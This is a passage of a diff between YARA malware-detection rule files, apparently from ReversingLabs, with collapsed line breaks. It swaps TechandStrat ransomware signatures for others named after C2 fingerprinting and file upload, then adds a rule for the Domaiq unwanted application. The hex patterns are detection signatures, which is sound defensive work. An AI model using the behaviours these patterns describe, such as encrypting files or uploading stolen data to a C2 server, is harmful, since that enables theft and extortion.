?? - ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D - 4D ?? 83 7D ?? ?? 8B 55 ?? 0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 - ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 4D ?? 83 7D ?? ?? 8B 55 ?? - 0F 43 4D ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? - ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 - 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? - E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? - ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 + $send_fingerprint_to_c2_p2 = { + 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 + 1F 0B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 78 13 ?? 12 ?? 28 ?? ?? ?? ?? + A2 25 1F 0D 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 77 13 ?? 12 ?? 28 ?? ?? + ?? ?? A2 25 1F 0F 1F 77 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 77 13 ?? 12 ?? 28 + ?? ?? ?? ?? A2 25 1F 11 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 66 13 ?? 12 + ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 72 13 + ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 16 1F + 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F + 18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 + 25 1F 1A 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? + ?? A2 25 1F 1C 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 6F 13 ?? 12 ?? 28 ?? + ?? ?? ?? A2 25 1F 1E 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1F 1F 65 13 ?? 12 ?? + 28 ?? ?? ?? ?? A2 25 1F 20 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 11 ?? 08 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 08 16 08 8E 69 6F + ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 + 6F ?? ?? ?? ?? 0D 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 13 ?? DE ?? 26 7E ?? ?? ?? ?? 13 + ?? DE ?? 11 } - $find_files_2_p2 = { - F8 ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF - 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8B F0 80 - BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 00 - ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B D0 - 8D 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? F6 - 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 - ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E9 + $get_files_and_directories_p1 = { + 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 31 ?? + 11 ?? 17 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1F 0F 8D + ?? ?? ?? ?? 25 16 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? + ?? ?? ?? A2 25 18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? + ?? ?? ?? A2 25 1A 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 74 13 ?? 12 ?? 28 ?? + ?? ?? ?? A2 25 1C 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 72 13 ?? 12 ?? 28 ?? + ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 1F 20 13 ?? 12 ?? 28 + ?? ?? ?? ?? A2 25 1F 0A 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 66 13 ?? 12 + ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 11 ?? A2 + 25 1F 0E 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 + ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ?? + 13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F + 16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ?? + 28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ?? + 28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ?? + 28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12 } - $encrypt_files_p1 = { - 6A ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 89 9D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 6A ?? FF B5 - ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF D6 8B D8 - 83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 57 - FF D6 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? - ?? ?? B9 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 - A5 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? - FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? - ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ?? - ?? ?? ?? 85 F6 0F 95 C3 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 89 B5 ?? ?? ?? ?? 56 53 FF + $get_files_and_directories_p2 = { + 28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F 79 13 ?? 12 + ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13 + ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F + 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F + 0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 + 25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ?? + ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ?? + ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 3C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44 + 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 52 + 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 3E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 72 ?? + ?? ?? ?? A2 25 1F 09 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? + ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13 ?? 16 13 ?? 38 + ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ?? 13 ?? 1F 0C 8D ?? ?? ?? ?? 25 16 11 ?? A2 + 25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F 16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ?? + 28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ?? + 28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ?? + 28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ?? + 28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? + 28 ?? ?? ?? ?? A2 25 1F 09 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 } - $encrypt_files_p2 = { - 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 56 ?? 8B 85 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 C8 8D 85 ?? ?? ?? ?? - 3B 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 6A ?? 0F 44 F2 56 6A ?? - FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 - ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF D7 BA ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 FF B5 - ?? ?? ?? ?? FF D6 B3 ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? - ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 - ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B - 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + $get_files_and_directories_p3 = { + 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68 + 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E + 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 + 1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? + A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? + ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28 + ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 46 + 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 4C + 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 45 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 72 ?? + ?? ?? ?? A2 25 1E 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 72 ?? + ?? ?? ?? A2 25 1F 0A 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? + ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 1F 0B 8D ?? ?? ?? ?? 25 + 16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 + 25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 + 25 1B 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 + 25 1D 1F 28 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 + 25 1F 09 1F 29 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? + ?? 13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E + 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F + } + $upload_file_to_c2_p1 = { + 11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 3E ?? ?? ?? ?? 11 ?? + 17 9A 17 8D ?? ?? ?? ?? 25 16 1F 22 9D 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 39 + ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ?? + 13 ?? 1F 0D 8D ?? ?? ?? ?? 25 16 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 40 13 + ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 + 25 1A 28 ?? ?? ?? ?? A2 25 1B 1F 7C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 28 ?? ?? ?? + ?? A2 25 1D 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 11 ?? A2 25 1F 09 1F 40 13 ?? + 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 32 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 40 + 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 11 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? + 02 02 7B ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 1F 1E 8D ?? ?? ?? ?? 25 16 1F 66 13 ?? + 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 6C 13 ?? + 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5B 13 ?? + 12 ?? 28 ?? ?? ?? ?? A2 25 1B 11 ?? A2 25 1C 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 + 1D 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 + 1F 09 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28 + } + $upload_file_to_c2_p2 = { + A2 25 1F 0B 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 70 13 ?? 12 ?? 28 ?? ?? + ?? ?? A2 25 1F 0D 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6F 13 ?? 12 ?? 28 + ?? ?? ?? ?? A2 25 1F 0F 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 64 13 ?? 12 + ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 64 13 + ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F + 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F + 16 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 + 25 1F 18 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 72 13 ?? 12 ?? 28 ?? ?? ?? + ?? A2 25 1F 1A 1F 76 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 65 13 ?? 12 ?? 28 ?? + ?? ?? ?? A2 25 1F 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 2E 13 ?? 12 ?? + 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 1F 0F 8D ?? ?? ?? ?? 25 16 1F + 66 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F + 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F + 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F } condition: - uint16(0)==0x5A4D and ( all of ($find_files_*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and ( all of ($send_fingerprint_to_c2_p*)) and ( all of ($get_files_and_directories_p*)) and ( all of ($upload_file_to_c2_p*)) } -rule REVERSINGLABS_Win32_Ransomware_Techandstrat : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_PUA_Domaiq : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects TechandStrat ransomware." + description = "Yara rule that detects Domaiq potentially unwanted application." author = "ReversingLabs" - id = "525d0b48-2018-5848-b9e7-def8395254eb" - date = "2021-05-17" - modified = "2021-05-17" + id = "44129e4b-7dc2-5af0-b466-80dc4f4d6388" + date = "2020-07-28" + modified = "2020-07-28" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.TechandStrat.yara#L1-L106" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "80e201cf91adeee100e05af3ba5227fc61968bb6e0ce602107ba1217a7a62856" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/pua/Win32.PUA.Domaiq.yara#L1-L169" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e291a639aa027a2257eec2853e40a222afabf23b32898326a1d5b48be823202c" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "TechandStrat" - tc_detection_factor = 5 + tc_detection_type = "PUA" + tc_detection_name = "Domaiq" + tc_detection_factor = 1 importance = 25 strings: - $enum_shares_p1 = { - 55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? C7 45 ?? ?? ?? - ?? ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF - 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF - 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 + $payload = "PEFxdWlFbXBpZXphRWxQYXlsb2FkPg" + $NSIS_CheckIntegrity = { + 57 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 75 ?? 6A 1C 8D 45 + D8 53 50 E8 ?? ?? ?? ?? 8B 45 D8 A9 F0 FF FF FF 75 ?? 81 7D DC EF BE AD DE 75 ?? 81 + 7D E8 49 6E 73 74 75 ?? 81 7D E4 73 6F 66 74 75 ?? 81 7D E0 4E 75 6C 6C 75 ?? 09 45 + 08 8B 45 08 8B 0D ?? ?? ?? ?? 83 E0 02 09 05 ?? ?? ?? ?? 8B 45 F0 3B C6 89 0D ?? ?? + ?? ?? 0F 8F ?? ?? ?? ?? F6 45 08 08 75 ?? F6 45 08 04 75 } - $enum_shares_p2 = { - 8D 46 ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF 36 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B - 7D ?? 72 ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A - ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 - 5D C2 + $NSIS_ErrorPart = { + 81 EC ?? ?? ?? ?? 53 55 56 33 DB 57 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C6 44 + 24 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A + ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 8D 44 24 ?? 68 ?? ?? ?? ?? 50 53 + 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? BF ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? + ?? ?? A3 ?? ?? ?? ?? 8B C7 75 } - $find_files = { - 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? - 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 - 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA ?? 75 ?? 8D 43 ?? 3B C8 74 ?? - 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF 80 FA ?? 74 ?? 80 FA ?? 74 ?? - 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 - C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? - ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 